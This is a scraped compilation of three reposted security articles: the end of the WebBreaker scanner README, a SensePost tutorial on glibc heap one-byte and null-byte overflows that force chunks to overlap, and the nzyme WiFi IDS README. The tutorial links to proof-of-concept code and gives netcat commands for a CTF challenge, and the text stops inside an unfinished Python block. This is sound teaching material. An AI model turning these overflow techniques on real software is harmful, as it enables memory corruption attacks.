webbreaker webinspect scan --settings /Users/Matt/Documents/important_site_auth

Initial Fortify SSC listing with authentication (SSC token is managed for 1 day):
webbreaker fortify list --fortify_user matt --fortify_password abc123

Interactive listing of all Fortify SSC application versions:
webbreaker fortify list

List Fortify SSC versions by application (case sensitive):
webbreaker fortify list --application WEBINSPECT

Upload to Fortify SSC with command-line authentication:
webbreaker fortify upload --fortify_user $FORT_USER --fortify_password $FORT_PASS --version important_site_auth

Upload to Fortify SSC with interactive authentication & application version configured with fortify.ini:
webbreaker fortify upload --version important_site_auth --scan_name auth_scan

Upload to Fortify SSC with application/project & version name:
webbreaker fortify upload --application my_other_app --version important_site_auth --scan_name auth_scan

WebBreaker Console Output

webbreaker webinspect scan --settings MyCustomWebInspectSetting --scan_policy Application --scan_name some_scan_name

 _       __     __    ____                  __
| |     / /__  / /_  / __ )________  ____ _/ /_____  _____
| | /| / / _ \/ __ \/ __  / ___/ _ \/ __ `/ //_/ _ \/ ___/
| |/ |/ /  __/ /_/ / /_/ / /  /  __/ /_/ / ,<  /  __/ /
|__/|__/\___/_.___/_____/_/   \___/\__,_/_/|_|\___/_/

Version 1.2.0

JIT Scheduler has selected endpoint https://some.webinspect.server.com:8083.
WebInspect scan launched on https://some.webinspect.server.com:8083 your scan id: ec72be39-a8fa-46b2-ba79-10adb52f8adb !!
Scan results file is available: some_scan_name.fpr
Scan has finished.
Webbreaker complete.

Bugs and Feature Requests

Found something that doesn't seem right or have a feature request? Please open a new issue.

Copyright and License

Copyright 2017 Target Brands, Inc. Licensed under MIT.

Sursa: https://github.com/target/webbreaker
Linux Heap Exploitation Intro Series: The magicians cape – 1 Byte Overflow
Reading time ~21 min
Posted by javier on 20 September 2017
Categories: Heap, Heap linux, Heap overflow

Intro

Hello again! It’s been a while since the last blog post. This is due to not having as much time as we wanted, but hopefully you all kept pace with these heapy things, as they are easy to forget given the heavy amount of little details the heap involves. In this post we are going to demonstrate how a single byte overflow with a user controlled value can make chunks disappear from the implementation’s point of view, like a magician putting a cape on top of objects (chunks) and making them disappear.

The Vulnerability

Preface

For the second part of our series we are going for another rather common vulnerability happening out there. From my own experience, it is sometimes confusing and hard to get the sizes right for elements (be it arrays, allocations, variables in general) because of the confusion between declaring “something” and actually accessing each element (i.e. byte) of that “something”. I know, sounds weird, but look at the following code:

int array_of_integers[10]; // (1)
int i;

for (i = 1; i <= 10; i++) // (2)
{
    array_of_integers[i] = 1; // (3)
}

In this code, we wanted to have an array of ten integers (1) and then iterate over the array (2) and set every element of the array to the number 1. As you might or might not know, the first element of an array in C is not at index one; indices start with zero (array_of_integers[0]). What will happen here is that when the variable i reaches 10, the code will try to write to array_of_integers[10], which is not allocated, effectively doing an out-of-bounds write of exactly 4 bytes more than expected, as 4 bytes is the size of an int.
Also, keeping pace with the ptmalloc2 implementation and to keep these blog posts as “fresh” and “new” as possible: here we have a fairly new exploit against SAPCAR (CVE-2017-8852) by CoreSecurity that takes advantage of a buffer overflow happening in the heap. It’s an easy and cool read!

What

This kind of vulnerability falls into the category of buffer overflows or out-of-bounds accesses. Specifically, in this blog post we are going to see what can happen in the case of an out-of-bounds 1 byte write. At first glance one could think there are not many possibilities in writing just one byte but, if we remember how an allocated chunk is placed in memory, we begin to “believe”:

+-+-+-+-+-+-+-+-+-+-+-+-+
| PREV_SIZE OR USER DATA| <-- Previous Chunk Data (OVERFLOW HERE)
+-----------------+-+-+-+ <-- Chunk start
| CHUNK SIZE      |A|M|P|
+-----------------+-+-+-+
| USER DATA             |
|                       |
| - - - - - - - - - - - |
| PREV_SIZE OR USER DATA|
+-----------------------+ <-- End of chunk

As we can see, a 1 byte overwrite will mess up the Main Arena (A), Is MMapped (M) and Previous in-use (P) bits as well as overwriting the first byte of the CHUNK SIZE. The implications of this type of vulnerability are (cliché) endless: changing the previous in-use bit can lead to strange memory corruptions that, when free()‘ing maliciously crafted memory, lead to arbitrary overwrites (overwriting pointers to functions); shrinking or growing adjacent chunks by tampering with the next chunk’s size leads to chunks overlapping or memory fragmentation, which in turn leads to use-after-invalidation bugs (memory leaks, use-after-free, etc.).

When stars collide one byte

To prepare the scenario for this kind of vulnerability, I inspired myself heavily on the Forgotten Chunks [1] paper by Context. I took my own way in the sense that I decided to build two proof of concepts for the techniques described there, as well as a challenge for you to test out!
One byte write

In this scenario we count with the following: there are three allocated chunks, and the first of them, A, is the one vulnerable to our one byte overflow. To simplify things, we can write into the first two chunks A and B but not into the third chunk C. We can read from all of them. Let’s see the initial state of the heap in our beloved chunky-ascii-art:

+---HEAP GROWS UPWARDS
|
|   +-+-+-+-+-+-+
|   | CHUNK A   | <-- Read/Write
|   +-----------+
|   | CHUNK B   | <-- Read/Write
|   +-----------+
|   | CHUNK C   | <-- Read
|   +-----------+
|   | TOP       |
|   |           |
V   |           |
    +-----------+

Our goal is to write into chunk C. To do so we need the following to happen.

1 – Prior to any overflow, and to prevent memory corruptions because we are going to overflow into chunk B, the first thing to make happen is to free() chunk B.

+---HEAP GROWS UPWARDS
|
|   +-+-+-+-+-+-+
|   | CHUNK A   | <-- Read/Write
|   +-----------+
|   | FREE B    |
|   +-----------+
|   | CHUNK C   | <-- Read
|   +-----------+
|   | TOP       |
|   |           |
V   |           |
    +-----------+

2 – Now that chunk B is free, we trigger the one byte overflow present in chunk A and overflow one byte into chunk B. This changes the first byte of chunk B’s size – in our case, we will make it grow. Let’s say that our chunks are of the following sizes: A(0x100-WORD_SIZE), B(0x100-WORD_SIZE), C(0x40-WORD_SIZE).

Let me state that WORD_SIZE is a variable that will be 8 on 64-bit systems and 4 on 32-bit systems. This was already explained in the Painless Intro to ptmalloc2 blog post but again: this WORD_SIZE is subtracted from the size we actually want because it is the size that the chunk’s size header will take in memory. So, to keep the chunks within the size we expect (0x100 or 0x40), we subtract the size header’s size (WORD_SIZE) to prevent padding to the next WORD_SIZE*2 size. I know this is too condensed, but being able to understand this is a must in order to proceed. By now we can see where all this goes, right?
That’s it, we are about to overwrite chunk B’s size to make it big enough to cover B+C. So, we know that B is 0x100 and C is 0x40; then let me ask you a question: with which byte would we need to overflow A so that B’s size completely overlaps C on a 64-bit system?

a) 0x40
b) 0x41
c) 0x48

That’s right, none of them. We shouldn’t choose values ending in zero or an even number because all of these, in binary, translate to leaving the last bit unset. This means that the PREV_INUSE bit will be set to zero, creating a memory corruption in some cases as chunk A is not really free. That leaves 0x40 and 0x48 out. If you chose 0x48, you might know the reason why 0x41 is not valid to completely overlap C: because we need to add 8 bytes due to C’s size header length placed just after B. The right answer is 0x51, as it keeps the PREV_INUSE bit set and is the next 16-byte padded size.

Enough chit-chat, but it was necessary. Remember that B is free()‘d, so B->fd and B->bk (pointers to the next and previous free chunks, if any) are set, as well as the next chunk’s (C) PREV_SIZE:

-=Data gets populated from right to left and from top to bottom=-

+-----------------+-+-+-+
|CHUNK A SIZE = \x01\x01| <-- Size 0x100 + 0x1 (PREV_INUSE bit)
+-----------------+-+-+-+
|x51\x51\x51\x51\x51\x51|
|x51\x51\x51\x51\x51\x51|
|x51\x51\x51\x51\x51\x51|
|x51\x51\x51\x51\x51\x51|
+-----------------+-+-+-+
|FREE B SIZE  = \x01\x51| <-- Size Overflown 0x151
+-----------------+-+-+-+
|B->fd = main_arena->TOP|
|B->bk = main_arena->TOP|
+-----------------------+
|PREV_SIZE B  = \x01\x01| <-- PREV_SIZE now doesn't match B size
+-----------------------+
|CHUNK C SIZE =     \x41| <-- 0x40 + 0x1
+-----------------+-+-+-+
|                       |
|                       |
|                       |
|                       |
+-----------------------+
| TOP                   | <-- B->fd and B->bk point here
+-----------------------+
|                       |
|                       |
|                       |
|                       |
+-----------------------+

3 – Ok! The buffer overflow is triggered now and chunk B’s size has been changed to 0x151.
What should happen now to overlap into chunk C? We need an allocation of a size near: old B size + C size = 0x100 + 0x40. When the following allocation happens:

B = malloc(0x100+0x40);

chunk B will now be overlapping chunk C in its entirety, as we can see in the following figure.

-=Data gets populated from right to left and from top to bottom=-

 <--- 8 bytes wide --->
+-----------------+-+-+-+
|CHUNK A SIZE = \x01\x01|
+-----------------+-+-+-+
|x51\x51\x51\x51\x51\x51|
|x51\x51\x51\x51\x51\x51|
|x51\x51\x51\x51\x51\x51|
|x51\x51\x51\x51\x51\x51|
+-----------------+-+-+-+
|CHUNK B SIZE = \x01\x51| <-- Size Overflown 0x151
+-----------------+-+-+-+
|B->fd = main_arena->TOP| <-- Even if allocated...
|B->bk = main_arena->TOP| <-- ...memory isn't cleared and...
+-----------------------+
|PREV_SIZE B  = \x01\x01| <-- ...values are kept in memory.
+-----------------------+
|CHUNK C SIZE =     \x41|
+-----------------+-+-+-+
|                       |
|                       |
+-----------------------+ <-- B now takes up to here (1)
| TOP                   |
+-----------------------+
|                       |
|                       |
|                       |
|                       |
+-----------------------+

(1) The “mathemata” out there must have spotted that chunk B actually goes 8 bytes into TOP, but that is not a problem for us for now.

4 – As a last step, we just need to write into chunk B at our desired position, effectively achieving our main goal: writing into chunk C.
-=Data gets populated from right to left and from top to bottom=-

 <--- 8 bytes wide --->
+-----------------+-+-+-+
|CHUNK A SIZE = \x01\x01|
+-----------------+-+-+-+
|x51\x51\x51\x51\x51\x51|
|x51\x51\x51\x51\x51\x51|
|x51\x51\x51\x51\x51\x51|
|x51\x51\x51\x51\x51\x51|
+-----------------+-+-+-+
|CHUNK B SIZE = \x01\x51|
+-----------------+-+-+-+
|x42\x42\x42\x42\x42\x42| <-- Setting all B to hex('B') = '\x42'
|x42\x42\x42\x42\x42\x42|
+-----------------------+
|x42\x42\x42\x42\x42\x42|
+-----------------------+
|x42\x42\x42\x42\x42\x42|
+-----------------+-+-+-+
|x42\x42\x42\x42\x42\x42| <-- chunk C got overlapped and written
|x42\x42\x42\x42\x42\x42|
|x42\x42\x42\x42\x42\x42|
|x42\x42\x42\x42\x42\x42|
+-----------------------+
| TOP                   |
+-----------------------+
|                       |
|                       |
|                       |
|                       |
+-----------------------+

Cool. If, prior to filling all of chunk B with \x42, the “magically disappeared” chunk C gets free()‘d, we will be able to leak pointers to main_arena->top by reading the contents of B. Also, if C is still in use, we can control the data inside it by writing at high positions in B. There are many more possibilities!

One null byte write

This scenario is initially the same as the previous one, except that the sizes are A(0x100), B(0x250) and C(0x100); also, we can only overflow with a null byte \x00. As the first steps are the same as in the one byte write, we go straight to the null byte overflow. Note that this is more likely to happen because in C all strings must be terminated with the “null byte”. Our goal here is to make the implementation forget about an allocated chunk by overlapping it with free space.

1 – We overflow in the same way as before, but what happens next is quite different. We are shrinking the size of chunk B from 0x250 to 0x200.
-=Data gets populated from right to left and from top to bottom=-

+-----------------+-+-+-+
|CHUNK A SIZE = \x01\x01| <-- Size 0x100 + 0x1 (PREV_INUSE bit)
+-----------------+-+-+-+
| EREH OG NAC GNIRTS YNA| <-- ANY STRING CAN GO HERE
|     EB LLIW TI ESUACEB| <-- BECAUSE IT WILL BE
|        DETANIMRET LLUN| <-- NULL TERMINATED
|AAAAAAAAAAAAAAAAAAAAAAA|
+-----------------+-+-+-+
|FREE B SIZE  = \x02\x00| <-- Size byte overflown 0x250 --> 0x200
+-----------------+-+-+-+
|B->fd = main_arena->TOP|
|B->bk = main_arena->TOP|
|                       |
|                       | <-- Free B ends here now (1)
|                       |
|                       |
+-----------------------+ <-- Free space still ends here (2)
|PREV_SIZE B  = \x02\x50| <-- C PREV_SIZE doesn't match B size
+-----------------------+
|CHUNK C SIZE = \x01\x00| <-- PREV_INUSE is zero now.
+-----------------+-+-+-+
|                       |
|                       |
+-----------------------+
| TOP                   |
+-----------------------+
|                       |
|                       |
|                       |
|                       |
+-----------------------+

Chunk B has shrunk (1) and this will have its consequences. The first and easiest to see is that chunk C’s PREV_SIZE (remember that this value is used to merge free chunks) is different from the actual chunk B size. The second consequence is that, from the implementation’s perspective, the free space between chunk A and chunk C (2) is somewhat “divided” (it is corrupted already). These consequences together have a third and final consequence: if we allocate two new chunks (J and K) of smaller size than 0x200/2 (0x100)…

2 – … the implementation is going to properly allocate these in the space of chunk B, because there is space for two chunks of size, let’s say, 0x80.
-=Data gets populated from right to left and from top to bottom=-

+-----------------+-+-+-+
|CHUNK A SIZE = \x01\x01| <-- Size 0x100 + 0x1 (PREV_INUSE bit)
+-----------------+-+-+-+
| EREH OG NAC GNIRTS YNA|
|     EB LLIW TI ESUACEB|
|        DETANIMRET LLUN|
|AAAAAAAAAAAAAAAAAAAAAAA|
+-----------------+-+-+-+
|CHUNK J SIZE = \x00\x81|
+-----------------+-+-+-+
|                       |
|                       |
+-----------------------+
|CHUNK K SIZE = \x00\x81|
+-----------------------+
|                       |
|                       |
+-----------------------+
|PREV_SIZE B  = \x02\x50| <-- C PREV_SIZE doesn't match B size
+-----------------------+
|CHUNK C SIZE = \x01\x00|
+-----------------+-+-+-+
|                       |
|                       |
+-----------------------+
| TOP                   |
+-----------------------+
|                       |
|                       |
|                       |
|                       |
+-----------------------+

Not much to explain about two simple allocations. This leads us to the final part. Can you see which chunk is about to disappear from the implementation’s point of view (a Forgotten Chunk)?

3 – Finally, if we free() chunk J and chunk C, in that order, the unlink macro will kick in and merge both chunks into one free space. So, which chunk is under the cape formed by chunks J and C? That’s right, the newly allocated chunk K. First, chunk J is free()‘d – note that K’s PREV_INUSE is zero now due to the previous chunk J being free.
-=Data gets populated from right to left and from top to bottom=-

+-----------------+-+-+-+
|CHUNK A SIZE = \x01\x01| <-- Size 0x100 + 0x1 (PREV_INUSE bit)
+-----------------+-+-+-+
| EREH OG NAC GNIRTS YNA|
|     EB LLIW TI ESUACEB|
|        DETANIMRET LLUN|
|AAAAAAAAAAAAAAAAAAAAAAA|
+-----------------+-+-+-+
|FREE J SIZE  = \x00\x81| (3)
+-----------------+-+-+-+
|J->fd = main_arena->TOP|
|J->bk = main_arena->TOP|
+-----------------------+
|CHUNK K SIZE = \x00\x80|
+-----------------------+
|                       |
|                       |
+-----------------------+
|PREV_SIZE B  = \x02\x50| (2)
+-----------------------+
|CHUNK C SIZE = \x01\x00| (1)
+-----------------+-+-+-+
|                       |
|                       |
+-----------------------+
| TOP                   |
+-----------------------+
|                       |
|                       |
|                       |
|                       |
+-----------------------+

4 – Then, we are free()‘ing C. Now pay close attention to the following:
– Chunk C’s PREV_INUSE bit is unset (1)
– Chunk C’s PREV_SIZE is still the old B size, 0x250 (2)
– Chunk J is also free, and at the position of the old B (0x250 bytes back from chunk C) (3)

They are explained in reverse order because this is exactly how the unlink macro goes over them. It checks that the currently free()‘d chunk has its PREV_INUSE bit unset (1), then it proceeds to merge with the other free()‘d chunk, which is at C - PREV_SIZE = J. Now J and C are merged into one big free space at J. Poor K was in the middle of this merge and is now treated as free space – ptmalloc2 forgot about it.

-=Data gets populated from right to left and from top to bottom=-

+-----------------+-+-+-+
|CHUNK A SIZE = \x01\x01| <-- Size 0x100 + 0x1 (PREV_INUSE bit)
+-----------------+-+-+-+
| EREH OG NAC GNIRTS YNA|
|     EB LLIW TI ESUACEB|
|        DETANIMRET LLUN|
|AAAAAAAAAAAAAAAAAAAAAAA|
+-----------------+-+-+-+
|FREE J SIZE  = \x03\x51| <-- Free size starting here
+-----------------+-+-+-+
|J->fd = main_arena->TOP|
|J->bk = main_arena->TOP|
+ - - - - - - - - - - - +
|   CHUNK K FORGOTTEN!  |
+ - - - - - - - - - - - +
|                       |
+ - - - - - - - - - - - +
|                       |
|                       |
|                       |
|                       |
+-----------------------+ <-- Free size ends here
| TOP                   |
+-----------------------+
|                       |
|                       |
|                       |
|                       |
+-----------------------+

Now chunk K is in the new free()‘d area (in green), which again has nearly the same implications as the previous scenario: use-after-invalidation, leaks, arbitrary writes, etc.

The playground

Let’s go have some fun! As in the previous series, I am trying to create a tradition by providing proof of concepts and a challenge! You can get the playground’s code here.

Download Playground Code

In order to not make this blog post longer than expected, the proof of concepts provided are directly related to the When stars collide section. Worry not, for I have heavily commented each PoC. But wait! Don’t think I would be that lazy! Here, have some videos and a little explanation.

One byte write

This PoC is based around writing to chunk C. An X is written to a point in B after the vulnerability is triggered. This point in chunk B is exactly the previous-to-last byte in the overlapped C.

One null byte write

This one corresponds to the second scenario, with the difference that instead of creating J and K chunk variables, I have reused the B variable and just added an X variable to hold the fourth chunk. This chunk X is the one to be overlapped and overwritten, as we can see in the following video.

Now you

This second challenge is on 178.62.74.135 on ports 10000 and 10001. Your goal is to retrieve the flag by overlapping a chunk that you cannot read directly from – the vulnerable chunk is A!

nc 178.62.74.135 10000 -v
nc 178.62.74.135 10001 -v

The flag is in the form: SP{contents_of_the_flag}. Note that you must send us your exploit source code to be eligible to win! The winner will win a SensePost shirt and will be chosen regarding the following criteria:
– Originality – Programming language, code length, formatting, comments, etc.
– Accuracy – Did you do the maths or brute force it?
Hints
– There are 3 allocated chunks already: A(0x100), B(0x100) & C(0x80)
– Values with the last 3 bits set can cause weird behaviour
– There are hidden easter eggs for those trying to break things further
– You can calculate it or brute force it. Your call!
– No, you don’t need to solve the 2016 challenge

References
[1] Glibc Adventures: The Forgotten Chunks
Chris Evans/Tavis Ormandy – Single NUL byte overflow
Painless intro to the linux userland heap

Sursa: https://sensepost.com/blog/2017/linux-heap-exploitation-intro-series-the-magicians-cape-1-byte-overflow/
Nzyme

Introduction

Nzyme collects 802.11 management frames directly from the air and sends them to a Graylog (open source log management) setup for WiFi IDS, monitoring, and incident response. It only needs a JVM and a WiFi adapter that supports monitor mode.

Think about this like a long-term (months or years) distributed Wireshark/tcpdump that can be analyzed and filtered in real-time, using a powerful UI. If you are new to the fascinating space of WiFi security, you might want to read my Common WiFi Attacks And How To Detect Them blog post.

What kind of data does it collect?

Nzyme collects, parses and forwards all relevant 802.11 management frames. Management frames are unencrypted, so anyone close enough to a sending station (an access point, a computer, a phone, a lightbulb, a car, a juice maker, ...) can pick them up with nzyme.

- Association request
- Association response
- Probe request
- Probe response
- Beacon
- Disassociation
- Authentication
- Deauthentication

What do I need to run it?

Everything you need is available from Amazon Prime and is not very expensive. There is even a good chance you have the parts around already.

One or more WiFi adapters that support monitor mode on your operating system.

The most important component is one (or more) WiFi adapters that support monitor mode. Monitor mode is the special state of a WiFi adapter that makes it read and report all 802.11 frames, and not only certain management frames or frames of a network it is connected to. You could also call this mode sniffing mode: the adapter just spits out everything it sees on the channel it is tuned to. The problem is that many adapter/driver/operating system combinations do not support monitor mode.
The internet is full of compatibility information, but here are the adapters I run nzyme with on a Raspberry Pi 3 Model B:

- ALFA AWUS036NH - 2.4Ghz and 5Ghz (Amazon Prime, about $40)
- ALFA AWUS036NEH - 2.4Ghz (Amazon Prime, about $50)

If you have another one that supports monitor mode, you can use that one. Nzyme does not require any specific hardware.

A small computer to run nzyme on.

I recommend running nzyme on a Raspberry Pi 3 Model B. This is pretty much the reference architecture, because that is what I run it on. In the end, it shouldn't really matter what you run it on, but the docs and guides will most likely refer to a Raspberry Pi with Raspbian on it.

A Graylog setup

You need a Graylog setup with a GELF TCP input that is reachable by your nzyme sensors.

Channel hopping

The 802.11 standard defines many frequencies (channels) a network can operate on. This is useful to avoid contention and bandwidth issues, but also means that your wireless adapter has to be tuned to a single channel. During normal operations, your operating system will do this automatically for you.

Because we don't want to listen on only one, but possibly all WiFi channels, we either need dozens of adapters, with one adapter for each channel, or we cycle over multiple channels on a single adapter rapidly. Nzyme allows you to configure multiple channels per WiFi adapter. For example, if you configure nzyme to listen on channels 1,2,3,4,5,6 on wlan0 and 7,8,9,10,11 on wlan1, it will tune wlan0 to channel 1 for a configurable time (default is 1 second), then switch to channel 2, then to channel 3, and so on. By doing this, we might miss a bunch of wireless frames but are not missing out on any channels completely. The best configuration depends on your use-case, but usually you will want to tune to all 2.4 GHz and 5 GHz WiFi channels.
On Linux, you can get a list of channels your WiFi adapter supports like this: $ iwlist wlan0 channel wlan0 32 channels in total; available frequencies : Channel 01 : 2.412 GHz Channel 02 : 2.417 GHz Channel 03 : 2.422 GHz Channel 04 : 2.427 GHz Channel 05 : 2.432 GHz Channel 06 : 2.437 GHz Channel 07 : 2.442 GHz Channel 08 : 2.447 GHz Channel 09 : 2.452 GHz Channel 10 : 2.457 GHz Channel 11 : 2.462 GHz Channel 12 : 2.467 GHz Channel 13 : 2.472 GHz Channel 14 : 2.484 GHz Channel 36 : 5.18 GHz Channel 38 : 5.19 GHz Channel 40 : 5.2 GHz Channel 44 : 5.22 GHz Channel 46 : 5.23 GHz Channel 48 : 5.24 GHz Channel 52 : 5.26 GHz Channel 54 : 5.27 GHz Channel 56 : 5.28 GHz Channel 60 : 5.3 GHz Channel 62 : 5.31 GHz Channel 64 : 5.32 GHz Channel 100 : 5.5 GHz Channel 102 : 5.51 GHz Channel 104 : 5.52 GHz Channel 108 : 5.54 GHz Channel 110 : 5.55 GHz Channel 112 : 5.56 GHz Current Frequency:2.432 GHz (Channel 5) Things to keep in mind A few general things to know before you get started: Success will highly depend on how well supported your WiFi adapters and drivers are. Use the recommended adapters for best results. You can get them from Amazon Prime and have them ready in one or two days. At least on macOS, your adapter will not switch channels when already connected to a network. Make sure to disconnect from networks before using nzyme with the on-board WiFi adapter. On other systems, switching to monitor mode should disconnect the adapter from a possibly connected network. Nzyme works well with both OpenJDK and Oracle JDK and requires Java 7 or 8. WiFi adapters can draw quite a lot of current, and I have seen Raspberry Pi 3s shut down when connecting more than 3 ALFA adapters. Consider this before buying tons of adapters. Testing on a MacBook (You can skip this and go straight to a real installation on a Raspberry Pi or install it on any other device that runs Java and has supported WiFi adapters connected to it.)
Requirements Nzyme is able to put the onboard WiFi adapter of recent MacBooks into monitor mode so you don’t need an external adapter for testing. Remember that you cannot be connected to a wireless network while running nzyme, so the Graylog setup you send data to has to be local or you need a wired network connection or a second WiFi adapter as LAN/WAN uplink. Make sure you have Java 7 or 8 installed: $ java -version java version "1.8.0_121" Java(TM) SE Runtime Environment (build 1.8.0_121-b13) Java HotSpot(TM) 64-Bit Server VM (build 25.121-b13, mixed mode) Download and configure Download the most recent build from the [Releases] page. Create a new file called nzyme.conf in the same folder as your nzyme.jar file: nzyme_id = nzyme-macbook-1 channels = en0:1,2,3,4,5,6,8,9,10,11 channel_hop_command = sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport {interface} channel {channel} channel_hop_interval = 1 graylog_addresses = graylog.example.org:12000 beacon_frame_sampling_rate = 0 Note the graylog_addresses variable that has to point to a GELF TCP input in your Graylog setup. Adapt it accordingly. Please refer to the example config in the repository for a more verbose version with comments. Run After disconnecting from all WiFi networks (you might have to "forget" them in the macOS WiFi settings), you can start nzyme like this: $ java -jar nzyme-0.1.jar -c nzyme.conf 18:35:00.261 [main] INFO horse.wtf.nzyme.Main - Printing statistics every 60 seconds. Logs are in [logs/] and will be automatically rotated. 18:35:00.307 [main] WARN horse.wtf.nzyme.Nzyme - No Graylog uplinks configured. Falling back to Log4j output 18:35:00.459 [main] INFO horse.wtf.nzyme.Nzyme - Building PCAP handle on interface [en0] 18:35:00.474 [main] INFO horse.wtf.nzyme.Nzyme - PCAP handle for [en0] acquired. Cycling through channels <1,2,3,4,5,6,8,9,10,11>. 
18:35:00.483 [nzyme-loop-0] INFO horse.wtf.nzyme.Nzyme - Commencing 802.11 frame processing on [en0] ... (⌐■_■)–︻╦╤─ – – pew pew Nzyme is now collecting data and writing it into the Graylog input you configured. A message will look like this: [screenshot] Installation and configuration on a Raspberry Pi 3 Requirements The onboard WiFi chips of recent Raspberry Pi models can be put into monitor mode with the alternative nexmon driver. The problem is that the onboard antenna is not very good. If possible, use an external adapter that supports monitor mode instead. Make sure you have Java 7 or 8 installed: $ java -version openjdk version "1.8.0_40-internal" OpenJDK Runtime Environment (build 1.8.0_40-internal-b04) OpenJDK Zero VM (build 25.40-b08, interpreted mode) Download and configure Download the most recent build from the [Releases] page. Create a new file called nzyme.conf in the same folder as your nzyme.jar file: nzyme_id = nzyme-sensors-1 channels = wlan0:1,2,3,4,5,6,8,9,10,11,12,13,14|wlan1:36,38,40,44,46,48,52,54,56,60,62,64,100,102,104,108,110,112 channel_hop_command = sudo /sbin/iwconfig {interface} channel {channel} channel_hop_interval = 1 graylog_addresses = graylog.example.org:12000 beacon_frame_sampling_rate = 0 Note the graylog_addresses variable that has to point to a GELF TCP input in your Graylog setup. Adapt it accordingly. Please refer to the example config in the repository for a more verbose version with comments. Run $ java -jar nzyme-0.1.jar -c nzyme.conf 17:28:45.657 [main] INFO horse.wtf.nzyme.Main - Printing statistics every 60 seconds. Logs are in [logs/] and will be automatically rotated. 17:28:51.637 [main] INFO horse.wtf.nzyme.Nzyme - Building PCAP handle on interface [wlan0] 17:28:53.178 [main] INFO horse.wtf.nzyme.Nzyme - PCAP handle for [wlan0] acquired. Cycling through channels <1,2,3,4,5,6,8,9,10,11,12,13,14>. 17:28:53.268 [nzyme-loop-0] INFO horse.wtf.nzyme.Nzyme - Commencing 802.11 frame processing on [wlan0] ...
(⌐■_■)–︻╦╤─ – – pew pew 17:28:54.926 [main] INFO horse.wtf.nzyme.Nzyme - Building PCAP handle on interface [wlan1] 17:28:56.238 [main] INFO horse.wtf.nzyme.Nzyme - PCAP handle for [wlan1] acquired. Cycling through channels <36,38,40,44,46,48,52,54,56,60,62,64,100,102,104,108,110,112>. 17:28:56.247 [nzyme-loop-1] INFO horse.wtf.nzyme.Nzyme - Commencing 802.11 frame processing on [wlan1] ... (⌐■_■)–︻╦╤─ – – pew pew Collected frames will now start appearing in your Graylog setup. Note that DEB and RPM packages are in the making and will be released soon. Renaming WiFi interfaces (optional) The interface names wlan0, wlan1 etc. are not always deterministic. Sometimes they can change after a reboot, and suddenly nzyme will attempt to use the onboard WiFi chip that does not support monitor mode. To avoid this problem, you can "pin" interface names by MAC address. I like to rename the onboard chip to wlanBoard to avoid accidental usage. This is what ifconfig looks like with no external WiFi adapters plugged in.
pi@parabola:~ $ ifconfig eth0 Link encap:Ethernet HWaddr b8:27:eb:0f:0e:d4 inet addr:172.16.0.136 Bcast:172.16.0.255 Mask:255.255.255.0 inet6 addr: fe80::8966:2353:4688:c9a/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1327 errors:0 dropped:22 overruns:0 frame:0 TX packets:1118 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:290630 (283.8 KiB) TX bytes:233228 (227.7 KiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:304 errors:0 dropped:0 overruns:0 frame:0 TX packets:304 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1 RX bytes:24552 (23.9 KiB) TX bytes:24552 (23.9 KiB) wlan0 Link encap:Ethernet HWaddr b8:27:eb:5a:5b:81 inet6 addr: fe80::77be:fb8a:ad75:cca9/64 Scope:Link UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) In this case wlan0 is the onboard WiFi chip that we want to rename to wlanBoard. Open the file /lib/udev/rules.d/75-persistent-net-generator.rules and add wlan* to the device name whitelist: # device name whitelist KERNEL!="wlan*|ath*|msh*|ra*|sta*|ctc*|lcs*|hsi*", \ GOTO="persistent_net_generator_end" Reboot the system. After it is back up, open /etc/udev/rules.d/70-persistent-net.rules and change the NAME variable: SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", ATTR{address}=="b8:27:eb:5a:5b:81", ATTR{dev_id}=="0x0", ATTR{type}=="1", KERNEL=="wlan*", NAME="wlanBoard" Reboot the system again and enjoy the consistent naming. Any new WiFi adapter you plug in will be a classic, numbered wlan0, wlan1 etc. that can be safely referenced in the nzyme config without the chance of accidentally selecting the onboard chip, because it's called wlanBoard now.
eth0 Link encap:Ethernet HWaddr b8:27:eb:0f:0e:d4 inet addr:172.16.0.136 Bcast:172.16.0.255 Mask:255.255.255.0 inet6 addr: fe80::8966:2353:4688:c9a/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:349 errors:0 dropped:8 overruns:0 frame:0 TX packets:378 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:75761 (73.9 KiB) TX bytes:69865 (68.2 KiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:228 errors:0 dropped:0 overruns:0 frame:0 TX packets:228 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1 RX bytes:18624 (18.1 KiB) TX bytes:18624 (18.1 KiB) wlanBoard Link encap:Ethernet HWaddr b8:27:eb:5a:5b:81 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) Known issues Some WiFi adapters will not report the MAC timestamp in the radiotap header. The field will simply be missing in Graylog. This is usually an issue with the driver. The deauthentication and disassociation reason field is not reported correctly on some systems. This is known to be an issue on a 2016 MacBook Pro running macOS Sierra. Legal notice Make sure to comply with local laws, especially with regards to wiretapping, when running nzyme. Note that nzyme is never decrypting any data but only reading unencrypted data on unlicensed frequencies. Sursa: https://github.com/lennartkoopmann/nzyme
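As a reference for the Graylog side of the setup: the GELF TCP input mentioned above accepts null-byte-terminated JSON frames. The sketch below sends one such frame by hand (Python; the sensor name and WiFi metadata fields are hypothetical — nzyme's actual message schema is richer):

```python
import json
import socket
import time

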